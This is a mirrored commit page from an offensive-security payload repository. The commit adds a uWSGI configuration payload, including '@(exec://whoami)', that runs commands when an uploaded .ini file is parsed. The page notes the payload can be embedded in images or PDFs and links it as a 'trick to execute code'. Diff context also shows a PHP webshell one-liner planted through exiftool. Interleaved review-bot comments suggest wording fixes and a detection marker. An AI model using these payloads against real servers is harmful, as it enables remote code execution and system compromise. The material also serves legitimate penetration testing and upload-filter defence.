mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 09:25:26 +00:00
Merge pull request #629 from maxence-Doyensec/file-upload-uwsgi
add uwsgi configuration file to Upload Insecure File
This commit is contained in:
commit
776b2bd934
32
Upload Insecure Files/Configuration uwsgi.ini/README.md
Normal file
@ -0,0 +1,32 @@
# uWSGI configuration file
uWSGI configuration files can include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:
Example of malicious uwsgi.ini file:
```ini
[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; call a function returning a char *
characters = @(call://uwsgi_func)
```
When the configuration file will be parsed(e.g. restart, crash or autoreload) payload will be executed.
## uWSGI lax parsing
The uWSGI parsing of configuration file is lax. The previous payload can be embedded inside a binary file(e.g. image, pdf, ...).
## Thanks to
* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
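Review bot: the closing sentence of the first section, "When the configuration file will be parsed(e.g. restart, crash or autoreload) payload will be executed.", is missing a space before the parenthesis and reads better as "When the configuration file is parsed (e.g. on restart, crash or autoreload), the payload is executed." In the ini example, `sym://uwsgi_funny_function` and `call://uwsgi_func` look like real symbol names while `data://`, `http://` and `fd://` carry `[REDACTED]`; a one-line note that only `body = @(exec://whoami)` is a complete, directly observable entry and that the rest illustrate scheme names would stop readers from treating `uwsgi_funny_function` as an existing symbol. The "uWSGI lax parsing" section asserts that the payload survives inside a binary file but does not say what the parser tolerates; one sentence, or a pointer to the part of the cited Doyensec post that covers it, would make the claim checkable. Since the text itself ties execution to the parse event, a defender's takeaway would round the section off: keep upload paths out of any location uWSGI loads its configuration from, and flag uploaded files that contain the `@(` operator.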
13
Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini
Normal file
@ -0,0 +1,13 @@
[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://[REDACTED])
; read from http
test = @(http://[REDACTED])
; read from a file descriptor
content = @(fd://[REDACTED])
; read from a process stdout
body = @(exec://whoami)
; call a function returning a char *
characters = @(call://uwsgi_func)
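Review bot: this file repeats, line for line, the block already shown in the README.md of the same folder, so the two copies must be kept in sync; keeping the standalone file as the canonical sample and referencing it from the README would avoid the duplication. Three entries (`bar`, `test`, `content`) use `[REDACTED]` for the `data://`, `http://` and `fd://` schemes and therefore do not resolve to anything as shipped; a comment marking them as placeholders to be filled in would make the sample clearer. From a detection point of view, `body = @(exec://whoami)` is the one line in this file that both parses completely and has a visible effect, which makes the `@(exec://` operator the natural marker for anyone using these samples to build an upload filter; a comment saying so would help the defensive reader.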
@ -136,12 +136,14 @@ exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __h
If you are trying to upload files to a :
- PHP server, take a look at the [.htaccess](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess) trick to execute code.
- ASP server, take a look at the [web.config](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config) trick to execute code.
- uWSGI server, take a look at the [uwsgi.ini](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20uwsgi.ini/uwsgi.ini) trick to execute code.
Configuration files examples
- [.htaccess](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess)
- [web.config](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config)
- [httpd.conf](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Busybox%20httpd.conf)
- [\_\_init\_\_.py](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20Python%20__init__.py)
- [uwsgi.ini](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Configuration%20uwsgi.ini/uwsgi.ini)
Alternatively you may be able to upload a JSON file with a custom scripts, try to overwrite a dependency manager configuration file.
- package.json
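Review bot: the new uWSGI bullet links straight to the payload file (`.../Configuration%20uwsgi.ini/uwsgi.ini`), while the sibling `.htaccess` and `web.config` bullets link to their folders; linking to the folder would land the reader on the README.md that explains the `@()` operators and the parse-time trigger instead of on the bare ini file. The same applies to the `uwsgi.ini` entry added under "Configuration files examples", whose neighbours (`httpd.conf`, `__init__.py`) also point at folders. Minor and pre-existing, but worth fixing while the list is being touched: the context line "If you are trying to upload files to a :" has a stray space before the colon.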
@ -214,3 +216,4 @@ Upload the XML file to `$JETTY_BASE/webapps/`
* [A tip for getting RCE in Jetty apps with just one XML file! - Aug 4, 2022 - PT SWARM / @ptswarm](https://twitter.com/ptswarm/status/1555184661751648256/)
* [Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/)
* [Inyección de código en imágenes subidas y tratadas con PHP-GD - Spanish Resource - hackplayers](https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html)
* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
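Review bot: the added reference omits the publication date that the neighbouring entries carry ("Aug 4, 2022", "September 15, 2022"); the URL path (`2023/02/28`) gives it, so "February 28, 2023" can be added to the entry for consistency with the rest of the list. The bullet style (`* [title - source - authors](url)`) otherwise matches the existing entries.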